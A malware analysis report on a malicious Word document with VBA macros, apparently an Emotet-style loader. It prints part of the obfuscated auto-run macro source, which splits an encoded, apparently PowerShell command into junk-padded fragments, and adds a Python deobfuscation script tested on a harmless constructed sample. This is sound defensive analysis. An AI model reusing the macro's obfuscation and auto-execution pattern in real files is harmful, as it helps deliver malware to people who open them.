Verdict: MALICIOUS (risk score 184)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious OLE document carrying VBA macros. The critical heuristic OLE_VBA_SHELL reports a Shell() call, and the Document_Open macro means the code runs as soon as the document is opened with macros enabled (the user-execution step behind T1204.002). The carved macros.bas is heavily obfuscated: junk assignments (CDbl/Sgn/CStr of literals, reads of never-assigned variables) pad a chain of calls to a single helper, bcVtwV, each of which carves a substring out of a junk-wrapped base64-looking literal using arithmetic of the form v - v + N + v - v that folds to N. The Shell() call itself lies past the truncated preview. One chunk also carries PowerShell-style cmdlet splitting ('coN'+'Ve'+'rtT'+'o-s'), so the assembled blob is most likely an encoded PowerShell command that downloads and executes a second-stage payload, consistent with the ClamAV loader detection Doc.Malware.Emodldr-10025032-0.
Heuristics (6)
- CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- OLE_VBA_MACROS (medium, 2 related findings): Document contains VBA macro code
- OLE_VBA_SHELL (critical): Shell() call in VBA
- OLE_VBA_DOCOPEN (high): Document_Open macro
- EXTRACTED_FILE_STATIC_TRIAGE (info): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- EMBEDDED_URL (info): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI that Office itself writes into documents; it is not a download location and should not be treated as an indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41033 bytes | 58ddd6f22ab9ce9ca2f1a0541be6e44fbc5399e03d27641e7d961d723c23b76c |

Detection on macros.bas:
- ClamAV: no threats found (the Doc.Malware.Emodldr-10025032-0 match above is on the parent document, not on the decoded VBA text)
- Obfuscation or payload: likely. Carved artifact contains 17 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ZwFnNUYkX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
qFJnf = CDbl(74787)
GcBNAb = Sgn(85799)
avDZjK = fZaZz
ciFjiU = 43479
OwrJo = CStr(68150)
UiIQSa = kQprI
Application.Run akMFnT + "AuDBicrj" + tviSGW, MwMQr + UjcKEYBVwnrzMU + hLrSIj
Fwptq = CDbl(24331)
oiklVV = Sgn(11532)
YEpKwH = lDZzh
OtuwHP = 45562
Gkcudd = CStr(64391)
avWVu = mcwjvu
End Sub
Attribute VB_Name = "lUqfvZlp"
Sub OFiqRT(QTidX)
idMCbG = CDbl(35712)
XTdiUQ = Sgn(72792)
hEvZl = QmEVTO
QRQpIq = 25300
tzfWq = CStr(82384)
FIwCbB = ZhwrzM
End Sub
Function UjcKEYBVwnrzMU()
On Error Resume Next
djCGY = CDbl(54168)
hPlPW = Sgn(11823)
HmHfO = vYTTK
wJNHOV = 22338
wOnfmt = CStr(36783)
FPstKF = RTLAk
wQNDfRUOL = bcVtwV("IWK@8ADEANAA2AGMAZQA0AGYAZgAwlHmX", XmrzCl - XmrzCl + 6 + XmrzCl - XmrzCl, XmrzCl - XmrzCl + 24 + XmrzCl - XmrzCl)
EQivl = CDbl(61242)
THXtL = Sgn(30001)
twbsV = zTDaQ
rCwnDU = 52212
uzEkBN = CStr(23435)
zswivl = TsTfh
RBjsk = CDbl(32597)
NpqNF = Sgn(76558)
HwvJdP = oIWXMd
Iqvpd = 55273
piYZf = CStr(54510)
usDnzO = YwLafi
JNBToTOLlz = bcVtwV("kOBwGMAMgAzAGMAOQA1ADEAMwBlAGQAYwAzADQAYQA0ADIAOQA3ADIAZQBjAGUAOAAxAGEAYQBjADAAYwBmADMAMgBkAGQAOQAyAGUAOQA4ADEAOQAxAGYANwBjADEAMwAwADMAMQAyADAAMQA0ADgAYwAxADkAOABjADAANwBkAGMAYgBiADgAOAAyADQA%UV3", lMIiK - lMIiK + 5 + lMIiK - lMIiK, lMIiK - lMIiK + 187 + lMIiK - lMIiK)
tKUXnw = CDbl(10289)
vYbLVS = Sgn(26961)
jwmqt = SkNPk
sjOwwq = 92231
EBrfj = CStr(90933)
fLosKK = cbsnjc
GNSTj = CDbl(42917)
cJERf = Sgn(25226)
jAJZqk = LChwi
aoTqtB = 88616
qDEWBs = CStr(63352)
mWJmMB = hXSBr
WERdDnG = bcVtwV("IY27inBmADMAZQBjADYAq1", jKYMVG - jKYMVG + 7 + jKYMVG - jKYMVG, jKYMVG - jKYMVG + 14 + jKYMVG - jKYMVG)
KkXCvk = CDbl(77129)
OXiTOq = Sgn(94526)
DosiX = LmrOY
lTbzC = 78733
ThTFIs = CStr(97379)
wfTwL = cTdJM
MSDOBR = CDbl(27952)
iiUVH = Sgn(95407)
whCMb = aEiIl
SVnAUR = 48957
qsjzWM = CStr(81063)
BFFCpn = hJutal
diviU = bcVtwV("1453MDIAYwAzADUANgBjADUANQA5ADIAMgBlADAAZABhADAAMQAyAGUAMABmADMAMgAxAGMAYgA2ADQAMQBjADMAYwAwADAAOQA2AGIAOABlADEAMwAyAGMAYQA0AGQARcOt", uYkLh - uYkLh + 6 + uYkLh - uYkLh, uYkLh - uYkLh + 123 + uYkLh - uYkLh)
YFQfv = CDbl(93910)
izDiKi = Sgn(11073)
EqOaj = YDiwf
GraXwB = 54265
ahqQt = CStr(93805)
GCUiI = hEEiAB
aRGQM = CDbl(61380)
roVfqF = Sgn(87102)
YdjALU = FIOiX
SuXrUd = 34644
znaEZt = CStr(52631)
sAsClj = vclwB
WRqLjhkSm = bcVtwV("h8mADkAMwBmAGUAYwA3ADUANgA3ADIAZgA2ADIAZABkADEAo2j", zChiQ - zChiQ + 4 + zChiQ - zChiQ, zChiQ - zChiQ + 44 + zChiQ - zChiQ)
wCiIA = CDbl(47809)
woWcbu = Sgn(50944)
Jvmaza = NpUwi
cPjhQm = 99327
vvZVhh = CStr(8967)
PbqJTl = wVElio
ZqESCw = CDbl(93355)
IsssN = Sgn(59166)
ljpnk = bYHSn
owLsKJ = 31965
bkMnE = CStr(75040)
wRPNiK = FBqFU
ILjjbG = bcVtwV("zjKOABlAGEAMQBjADQAYgAwAGYANgAxADQANgAyAGIAYwAwAGUAMgA3AGQAOAAxAGMAOQBjADEAYgA0AGQAZQBkADEANwAwADUANgBjADIANwA1ADYAYwBiADcACs2L8", oBqHWZ - oBqHWZ + 4 + oBqHWZ - oBqHWZ, oBqHWZ - oBqHWZ + 120 + oBqHWZ - oBqHWZ)
zRzzO = CDbl(2875)
Zzzhj = Sgn(94262)
mATBj = pcHrFJ
ZtJCFo = 7826
JmNYC = CStr(58829)
BRhih = cEioWW
VErnb = CDbl(97731)
wDtOzH = Sgn(58467)
zpMLfA = MHcYVI
AzjSfz = 82955
qzlrOi = CStr(98693)
Ofzvn = jLlNj
sXvPwDlYvAA = bcVtwV("uwcCADIAMAA0ADcAZgA4ADIAYwA0ADkAMgA2ADEAYgA2ADkANABkAGQAMwA1AGUAMwA1ADIAYgA1ADQAMwBlADIAOAAyADkANgA5ADAAYQAwADYA'| &('coN'+'Ve'+'rtT'+'o-s'ICl", UKFuF - UKFuF + 5 + UKFuF - UKFuF, UKFuF - UKFuF + 135 + UKFuF - UKFuF)
jKDdqI = CDbl(6784)
iicfuX = Sgn(98394)
aolHN = OsVNCi
UhSPz = 84672
vHBGbD = CStr(58875)
CUBPWT = wbbipw
DGuQa = CDbl(89032)
BdRPsG = Sgn(64906)
qmaZdh = RXAuR
haZYK = 22571
JnNlZ = CStr(63512)
zTQZI = rwMSXS
hXKtH = bcVtwV("SM3iZA1AGMANwA0ADkAOAAxADkANQA3AGQAYwBlADIAMABlADUAMABiAGIANwA5ADYANABhADEANQBlADMAZAA5AGYAMgBlADgAZQBhAGQAZgBjADEAMAA4ADMAMwA0AGYAZAA5AGEAMQBjADUANAB,s", IdFYf -
... (truncated)
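Every string in the preview above passes through one helper, bcVtwV, with a junk-wrapped base64-looking literal and two arithmetic arguments of the form v - v + N + v - v. Those fold to N because never-assigned VBA variables are Empty (0) and On Error Resume Next swallows anything that would otherwise fail. The script below is an added example, not code from the report. It assumes that bcVtwV behaves like Mid(s, start, length) (its body lies past the truncation), that the pieces are joined in source order, and that the joined blob is a base64-encoded UTF-16LE PowerShell command; it demonstrates the recovery on a constructed, harmless payload built in the same style, and it checks the alignment of a single piece, which is how to tell whether a piece is really the first one.

```python
import base64
import re

# Call shape seen in the preview:
#   bcVtwV("<junk><piece><junk>", v - v + START + v - v, v - v + LEN + v - v)
# ASSUMPTION: the helper is a Mid(s, start, len) wrapper; its body is not in the preview.
CALL_RE = re.compile(r'\b(\w+)\(\s*"([^"]*)"\s*,\s*([^,]+?)\s*,\s*([^)]+?)\s*\)')
TOKEN_RE = re.compile(r"([+-])?\s*([A-Za-z_]\w*|\d+)")


def vba_arith(expr):
    """Fold a VBA +/- chain. Unassigned variables are Empty and coerce to 0,
    so 'v - v + 6 + v - v' is just 6."""
    total = 0
    for sign, tok in TOKEN_RE.findall(expr):
        value = int(tok) if tok.isdigit() else 0
        total += -value if sign == "-" else value
    return total


def vba_mid(s, start, length):
    """VBA Mid(): 1-based start; '' when start is before 1 or beyond the string."""
    if start < 1 or length < 0:
        return ""
    return s[start - 1:start - 1 + length]


def collect_pieces(vba_src, helper="bcVtwV"):
    """Apply Mid() semantics to every helper call in the decoded macro source.
    ASSUMPTION: source order is assembly order; the real sample's assembly code is
    past the truncation point and may reorder the pieces."""
    return [
        vba_mid(blob, vba_arith(start_expr), vba_arith(len_expr))
        for name, blob, start_expr, len_expr in CALL_RE.findall(vba_src)
        if name == helper
    ]


def utf16_alignment(piece):
    """Decode one piece on its own. ASCII text in UTF-16LE has 0x00 at every odd byte;
    NULs at the even bytes instead mean the piece starts mid-character, i.e. some other
    piece precedes it in the real blob."""
    raw = base64.b64decode(piece[: len(piece) - len(piece) % 4])
    if not raw:
        return "unknown"
    if all(b == 0 for b in raw[1::2]):
        return "aligned"
    if all(b == 0 for b in raw[0::2]):
        return "off-by-one"
    return "not utf-16le text"


def decode_powershell_blob(b64):
    """PowerShell -EncodedCommand is base64 over UTF-16LE text; tolerate lost padding."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def recover(vba_src, helper="bcVtwV"):
    return decode_powershell_blob("".join(collect_pieces(vba_src, helper)))


def make_constructed_sample(command, chunk=20):
    """Constructed demo input: obfuscate a harmless command the way the sample does
    (base64(UTF-16LE) split into junk-padded chunks). This is not the real payload."""
    b64 = base64.b64encode(command.encode("utf-16-le")).decode()
    lines = ["Function Stage()", "On Error Resume Next"]
    for n, i in enumerate(range(0, len(b64), chunk)):
        piece = b64[i:i + chunk]
        junk_before, junk_after = "JUNK"[: n % 4 + 1], "tail"
        start, length = len(junk_before) + 1, len(piece)
        lines.append(f'p{n} = bcVtwV("{junk_before}{piece}{junk_after}", '
                     f"v - v + {start} + v - v, v - v + {length} + v - v)")
    lines.append("End Function")
    return "\n".join(lines)


if __name__ == "__main__":
    demo = make_constructed_sample("Write-Host 'stage two would run here'")
    print(recover(demo))
```

Applied to the page's own first chunk, vba_mid("IWK@8ADEANAA2AGMAZQA0AGYAZgAwlHmX", 6, 24) yields ADEANAA2AGMAZQA0AGYAZgAw, and utf16_alignment reports it as off-by-one: decoded alone it gives bytes 00 31 00 34 00 36 ..., UTF-16LE text shifted by one byte, so that piece is not the start of the blob and the truncated assembly code, not source order, decides the real concatenation. Recover that order from the helper's caller before trusting the decoded command.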